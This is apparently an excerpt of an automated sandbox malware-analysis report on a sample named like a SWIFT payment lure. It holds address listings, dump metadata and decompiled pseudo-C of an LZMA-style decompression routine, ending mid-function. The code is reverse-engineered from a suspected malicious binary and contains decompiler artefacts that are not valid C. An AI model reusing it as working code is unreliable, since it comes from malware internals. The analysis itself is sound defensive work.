                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x004072ab
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00000000
                                                                                  0x00407323
                                                                                  0x00407321
                                                                                  0x00407234
                                                                                  0x00407237
                                                                                  0x00407239
                                                                                  0x0040723c
                                                                                  0x0040723f
                                                                                  0x00407242
                                                                                  0x00407244
                                                                                  0x00407247
                                                                                  0x0040724a
                                                                                  0x0040724a
                                                                                  0x0040724d
                                                                                  0x0040724d
                                                                                  0x00407250
                                                                                  0x00407257
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x0040722b
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00000000
                                                                                  0x00407259
                                                                                  0x00407257
                                                                                  0x004071dd
                                                                                  0x004071e0
                                                                                  0x004071e2
                                                                                  0x004071e5
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406f44
                                                                                  0x00406f44
                                                                                  0x00406f48
                                                                                  0x0040758d
                                                                                  0x00000000
                                                                                  0x0040758d
                                                                                  0x00406f4e
                                                                                  0x00406f51
                                                                                  0x00406f54
                                                                                  0x00406f57
                                                                                  0x00406f5a
                                                                                  0x00406f5d
                                                                                  0x00406f60
                                                                                  0x00406f62
                                                                                  0x00406f65
                                                                                  0x00406f68
                                                                                  0x00406f6b
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00406f6d
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x0040734c
                                                                                  0x00407350
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00407356
                                                                                  0x00407359
                                                                                  0x0040735c
                                                                                  0x0040735f
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407361
                                                                                  0x00407364
                                                                                  0x00407367
                                                                                  0x0040736a
                                                                                  0x0040736d
                                                                                  0x00407370
                                                                                  0x00407373
                                                                                  0x00407374
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407376
                                                                                  0x00407379
                                                                                  0x0040737c
                                                                                  0x0040737f
                                                                                  0x00407382
                                                                                  0x00407385
                                                                                  0x00407389
                                                                                  0x0040738b
                                                                                  0x0040738e
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x00000000
                                                                                  0x00407390
                                                                                  0x0040738e
                                                                                  0x004075c3
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00406bf2

                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.275199198.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.275194801.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275205932.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275210797.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.275257760.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_SWIFT MO104978172_1301 EURO 9700.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                  • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                  • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                  • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 98%
                                                                                  			E00406FFE() {
                                                                                  				signed int _t539;
                                                                                  				unsigned short _t540;
                                                                                  				signed int _t541;
                                                                                  				void _t542;
                                                                                  				signed int _t543;
                                                                                  				signed int _t544;
                                                                                  				signed int _t573;
                                                                                  				signed int _t576;
                                                                                  				signed int _t597;
                                                                                  				signed int* _t614;
                                                                                  				void* _t621;
                                                                                  
                                                                                  				L0:
                                                                                  				while(1) {
                                                                                  					L0:
                                                                                  					if( *(_t621 - 0x40) != 1) {
                                                                                  						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                                                                                  						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                                                                                  						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                                                                                  						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                                                                                  						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                                                                                  						_t539 =  *(_t621 - 4) + 0x664;
                                                                                  						 *(_t621 - 0x58) = _t539;
                                                                                  						goto L68;
                                                                                  					} else {
                                                                                  						 *(__ebp - 0x84) = 8;
                                                                                  						while(1) {
                                                                                  							L132:
                                                                                  							 *(_t621 - 0x54) = _t614;
                                                                                  							while(1) {
                                                                                  								L133:
                                                                                  								_t540 =  *_t614;
                                                                                  								_t597 = _t540 & 0x0000ffff;
                                                                                  								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                  								if( *(_t621 - 0xc) >= _t573) {
                                                                                  									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                  									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                  									 *(_t621 - 0x40) = 1;
                                                                                  									_t541 = _t540 - (_t540 >> 5);
                                                                                  									 *_t614 = _t541;
                                                                                  								} else {
                                                                                  									 *(_t621 - 0x10) = _t573;
                                                                                  									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                  									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                  								}
                                                                                  								if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                  									goto L139;
                                                                                  								}
                                                                                  								L137:
                                                                                  								if( *(_t621 - 0x6c) == 0) {
                                                                                  									 *(_t621 - 0x88) = 5;
                                                                                  									L170:
                                                                                  									_t576 = 0x22;
                                                                                  									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                                                                                  									_t544 = 0;
                                                                                  									L172:
                                                                                  									return _t544;
                                                                                  								}
                                                                                  								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                                                                                  								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                  								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                  								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                  								L139:
                                                                                  								_t542 =  *(_t621 - 0x84);
                                                                                  								while(1) {
                                                                                  									 *(_t621 - 0x88) = _t542;
                                                                                  									while(1) {
                                                                                  										L1:
                                                                                  										_t543 =  *(_t621 - 0x88);
                                                                                  										if(_t543 > 0x1c) {
                                                                                  											break;
                                                                                  										}
                                                                                  										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
                                                                                  											case 0:
                                                                                  												if( *(_t621 - 0x6c) == 0) {
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                  												_t543 =  *( *(_t621 - 0x70));
                                                                                  												if(_t543 > 0xe1) {
                                                                                  													goto L171;
                                                                                  												}
                                                                                  												_t547 = _t543 & 0x000000ff;
                                                                                  												_push(0x2d);
                                                                                  												asm("cdq");
                                                                                  												_pop(_t578);
                                                                                  												_push(9);
                                                                                  												_pop(_t579);
                                                                                  												_t617 = _t547 / _t578;
                                                                                  												_t549 = _t547 % _t578 & 0x000000ff;
                                                                                  												asm("cdq");
                                                                                  												_t612 = _t549 % _t579 & 0x000000ff;
                                                                                  												 *(_t621 - 0x3c) = _t612;
                                                                                  												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                                                                                  												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                                                                                  												_t620 = (0x300 << _t612 + _t617) + 0x736;
                                                                                  												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                                                                                  													L10:
                                                                                  													if(_t620 == 0) {
                                                                                  														L12:
                                                                                  														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                                                                                  														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                  														goto L15;
                                                                                  													} else {
                                                                                  														goto L11;
                                                                                  													}
                                                                                  													do {
                                                                                  														L11:
                                                                                  														_t620 = _t620 - 1;
                                                                                  														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                                                                                  													} while (_t620 != 0);
                                                                                  													goto L12;
                                                                                  												}
                                                                                  												if( *(_t621 - 4) != 0) {
                                                                                  													GlobalFree( *(_t621 - 4));
                                                                                  												}
                                                                                  												_t543 = GlobalAlloc(0x40, 0x600); // executed
                                                                                  												 *(_t621 - 4) = _t543;
                                                                                  												if(_t543 == 0) {
                                                                                  													goto L171;
                                                                                  												} else {
                                                                                  													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                                                                                  													goto L10;
                                                                                  												}
                                                                                  											case 1:
                                                                                  												L13:
                                                                                  												__eflags =  *(_t621 - 0x6c);
                                                                                  												if( *(_t621 - 0x6c) == 0) {
                                                                                  													 *(_t621 - 0x88) = 1;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                  												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                                                                                  												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                                                                                  												_t45 = _t621 - 0x48;
                                                                                  												 *_t45 =  *(_t621 - 0x48) + 1;
                                                                                  												__eflags =  *_t45;
                                                                                  												L15:
                                                                                  												if( *(_t621 - 0x48) < 4) {
                                                                                  													goto L13;
                                                                                  												}
                                                                                  												_t555 =  *(_t621 - 0x40);
                                                                                  												if(_t555 ==  *(_t621 - 0x74)) {
                                                                                  													L20:
                                                                                  													 *(_t621 - 0x48) = 5;
                                                                                  													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                                                                                  													goto L23;
                                                                                  												}
                                                                                  												 *(_t621 - 0x74) = _t555;
                                                                                  												if( *(_t621 - 8) != 0) {
                                                                                  													GlobalFree( *(_t621 - 8));
                                                                                  												}
                                                                                  												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                                                                                  												 *(_t621 - 8) = _t543;
                                                                                  												if(_t543 == 0) {
                                                                                  													goto L171;
                                                                                  												} else {
                                                                                  													goto L20;
                                                                                  												}
                                                                                  											case 2:
                                                                                  												L24:
                                                                                  												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                                                                                  												 *(_t621 - 0x84) = 6;
                                                                                  												 *(_t621 - 0x4c) = _t562;
                                                                                  												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                                                                                  												goto L132;
                                                                                  											case 3:
                                                                                  												L21:
                                                                                  												__eflags =  *(_t621 - 0x6c);
                                                                                  												if( *(_t621 - 0x6c) == 0) {
                                                                                  													 *(_t621 - 0x88) = 3;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                                                                                  												_t67 = _t621 - 0x70;
                                                                                  												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                                                                                  												__eflags =  *_t67;
                                                                                  												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                                                                                  												L23:
                                                                                  												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                                                                                  												if( *(_t621 - 0x48) != 0) {
                                                                                  													goto L21;
                                                                                  												}
                                                                                  												goto L24;
                                                                                  											case 4:
                                                                                  												L133:
                                                                                  												_t540 =  *_t614;
                                                                                  												_t597 = _t540 & 0x0000ffff;
                                                                                  												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                                                                                  												if( *(_t621 - 0xc) >= _t573) {
                                                                                  													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                                                                                  													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                                                                                  													 *(_t621 - 0x40) = 1;
                                                                                  													_t541 = _t540 - (_t540 >> 5);
                                                                                  													 *_t614 = _t541;
                                                                                  												} else {
                                                                                  													 *(_t621 - 0x10) = _t573;
                                                                                  													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                                                                                  													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                                                                                  												}
                                                                                  												if( *(_t621 - 0x10) >= 0x1000000) {
                                                                                  													goto L139;
                                                                                  												}
                                                                                  											case 5:
                                                                                  												goto L137;
                                                                                  											case 6:
                                                                                  												__edx = 0;
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__eax =  *(__ebp - 4);
                                                                                  													__ecx =  *(__ebp - 0x38);
                                                                                  													 *(__ebp - 0x34) = 1;
                                                                                  													 *(__ebp - 0x84) = 7;
                                                                                  													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                                  													L132:
                                                                                  													 *(_t621 - 0x54) = _t614;
                                                                                  													goto L133;
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                                  												__esi =  *(__ebp - 0x60);
                                                                                  												__cl = 8;
                                                                                  												__cl = 8 -  *(__ebp - 0x3c);
                                                                                  												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                                  												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                                  												__ecx =  *(__ebp - 0x3c);
                                                                                  												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                                  												__ecx =  *(__ebp - 4);
                                                                                  												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                                  												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                                  												__eflags =  *(__ebp - 0x38) - 4;
                                                                                  												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                                  												if( *(__ebp - 0x38) >= 4) {
                                                                                  													__eflags =  *(__ebp - 0x38) - 0xa;
                                                                                  													if( *(__ebp - 0x38) >= 0xa) {
                                                                                  														_t98 = __ebp - 0x38;
                                                                                  														 *_t98 =  *(__ebp - 0x38) - 6;
                                                                                  														__eflags =  *_t98;
                                                                                  													} else {
                                                                                  														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                                  													}
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x38) = 0;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x34) - __edx;
                                                                                  												if( *(__ebp - 0x34) == __edx) {
                                                                                  													__ebx = 0;
                                                                                  													__ebx = 1;
                                                                                  													goto L61;
                                                                                  												} else {
                                                                                  													__eax =  *(__ebp - 0x14);
                                                                                  													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                  													__eflags = __eax -  *(__ebp - 0x74);
                                                                                  													if(__eax >=  *(__ebp - 0x74)) {
                                                                                  														__eax = __eax +  *(__ebp - 0x74);
                                                                                  														__eflags = __eax;
                                                                                  													}
                                                                                  													__ecx =  *(__ebp - 8);
                                                                                  													__ebx = 0;
                                                                                  													__ebx = 1;
                                                                                  													__al =  *((intOrPtr*)(__eax + __ecx));
                                                                                  													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                                  													goto L41;
                                                                                  												}
                                                                                  											case 7:
                                                                                  												goto L0;
                                                                                  											case 8:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__eax =  *(__ebp - 4);
                                                                                  													__ecx =  *(__ebp - 0x38);
                                                                                  													 *(__ebp - 0x84) = 0xa;
                                                                                  													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                                  												} else {
                                                                                  													__eax =  *(__ebp - 0x38);
                                                                                  													__ecx =  *(__ebp - 4);
                                                                                  													__eax =  *(__ebp - 0x38) + 0xf;
                                                                                  													 *(__ebp - 0x84) = 9;
                                                                                  													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                                  													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                                  												}
                                                                                  												while(1) {
                                                                                  													L132:
                                                                                  													 *(_t621 - 0x54) = _t614;
                                                                                  													goto L133;
                                                                                  												}
                                                                                  											case 9:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													goto L89;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x60);
                                                                                  												if( *(__ebp - 0x60) == 0) {
                                                                                  													goto L171;
                                                                                  												}
                                                                                  												__eax = 0;
                                                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                                                  												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                                  												__eflags = _t258;
                                                                                  												0 | _t258 = _t258 + _t258 + 9;
                                                                                  												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                                  												goto L75;
                                                                                  											case 0xa:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__eax =  *(__ebp - 4);
                                                                                  													__ecx =  *(__ebp - 0x38);
                                                                                  													 *(__ebp - 0x84) = 0xb;
                                                                                  													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                                  													while(1) {
                                                                                  														L132:
                                                                                  														 *(_t621 - 0x54) = _t614;
                                                                                  														goto L133;
                                                                                  													}
                                                                                  												}
                                                                                  												__eax =  *(__ebp - 0x28);
                                                                                  												goto L88;
                                                                                  											case 0xb:
                                                                                  												__eflags =  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x40) != 0) {
                                                                                  													__ecx =  *(__ebp - 0x24);
                                                                                  													__eax =  *(__ebp - 0x20);
                                                                                  													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                                  												} else {
                                                                                  													__eax =  *(__ebp - 0x24);
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x28);
                                                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                                  												L88:
                                                                                  												__ecx =  *(__ebp - 0x2c);
                                                                                  												 *(__ebp - 0x2c) = __eax;
                                                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                                  												L89:
                                                                                  												__eax =  *(__ebp - 4);
                                                                                  												 *(__ebp - 0x80) = 0x15;
                                                                                  												__eax =  *(__ebp - 4) + 0xa68;
                                                                                  												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                                  												goto L68;
                                                                                  											case 0xc:
                                                                                  												L99:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0xc;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t334 = __ebp - 0x70;
                                                                                  												 *_t334 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t334;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												__eax =  *(__ebp - 0x2c);
                                                                                  												goto L101;
                                                                                  											case 0xd:
                                                                                  												L37:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0xd;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t122 = __ebp - 0x70;
                                                                                  												 *_t122 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t122;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												L39:
                                                                                  												__eax =  *(__ebp - 0x40);
                                                                                  												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                  												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                                  													goto L48;
                                                                                  												}
                                                                                  												__eflags = __ebx - 0x100;
                                                                                  												if(__ebx >= 0x100) {
                                                                                  													goto L54;
                                                                                  												}
                                                                                  												L41:
                                                                                  												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                                  												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                                  												__ecx =  *(__ebp - 0x58);
                                                                                  												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                                  												 *(__ebp - 0x48) = __eax;
                                                                                  												__eax = __eax + 1;
                                                                                  												__eax = __eax << 8;
                                                                                  												__eax = __eax + __ebx;
                                                                                  												__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                  												__ax =  *__esi;
                                                                                  												 *(__ebp - 0x54) = __esi;
                                                                                  												__edx = __ax & 0x0000ffff;
                                                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  													__cx = __ax;
                                                                                  													 *(__ebp - 0x40) = 1;
                                                                                  													__cx = __ax >> 5;
                                                                                  													__eflags = __eax;
                                                                                  													__ebx = __ebx + __ebx + 1;
                                                                                  													 *__esi = __ax;
                                                                                  												} else {
                                                                                  													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                                  													 *(__ebp - 0x10) = __ecx;
                                                                                  													0x800 = 0x800 - __edx;
                                                                                  													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                                  													__ebx = __ebx + __ebx;
                                                                                  													 *__esi = __cx;
                                                                                  												}
                                                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  												 *(__ebp - 0x44) = __ebx;
                                                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  													goto L39;
                                                                                  												} else {
                                                                                  													goto L37;
                                                                                  												}
                                                                                  											case 0xe:
                                                                                  												L46:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0xe;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t156 = __ebp - 0x70;
                                                                                  												 *_t156 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t156;
                                                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												while(1) {
                                                                                  													L48:
                                                                                  													__eflags = __ebx - 0x100;
                                                                                  													if(__ebx >= 0x100) {
                                                                                  														break;
                                                                                  													}
                                                                                  													__eax =  *(__ebp - 0x58);
                                                                                  													__edx = __ebx + __ebx;
                                                                                  													__ecx =  *(__ebp - 0x10);
                                                                                  													__esi = __edx + __eax;
                                                                                  													__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                                  													__ax =  *__esi;
                                                                                  													 *(__ebp - 0x54) = __esi;
                                                                                  													__edi = __ax & 0x0000ffff;
                                                                                  													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                  													__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                  													if( *(__ebp - 0xc) >= __ecx) {
                                                                                  														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                  														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                  														__cx = __ax;
                                                                                  														_t170 = __edx + 1; // 0x1
                                                                                  														__ebx = _t170;
                                                                                  														__cx = __ax >> 5;
                                                                                  														__eflags = __eax;
                                                                                  														 *__esi = __ax;
                                                                                  													} else {
                                                                                  														 *(__ebp - 0x10) = __ecx;
                                                                                  														0x800 = 0x800 - __edi;
                                                                                  														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                  														__ebx = __ebx + __ebx;
                                                                                  														 *__esi = __cx;
                                                                                  													}
                                                                                  													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                  													 *(__ebp - 0x44) = __ebx;
                                                                                  													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                  														continue;
                                                                                  													} else {
                                                                                  														goto L46;
                                                                                  													}
                                                                                  												}
                                                                                  												L54:
                                                                                  												_t173 = __ebp - 0x34;
                                                                                  												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                                  												__eflags =  *_t173;
                                                                                  												goto L55;
                                                                                  											case 0xf:
                                                                                  												L58:
                                                                                  												__eflags =  *(__ebp - 0x6c);
                                                                                  												if( *(__ebp - 0x6c) == 0) {
                                                                                  													 *(__ebp - 0x88) = 0xf;
                                                                                  													goto L170;
                                                                                  												}
                                                                                  												__ecx =  *(__ebp - 0x70);
                                                                                  												__eax =  *(__ebp - 0xc);
                                                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                  												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                  												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                  												_t203 = __ebp - 0x70;
                                                                                  												 *_t203 =  *(__ebp - 0x70) + 1;
                                                                                  												__eflags =  *_t203;
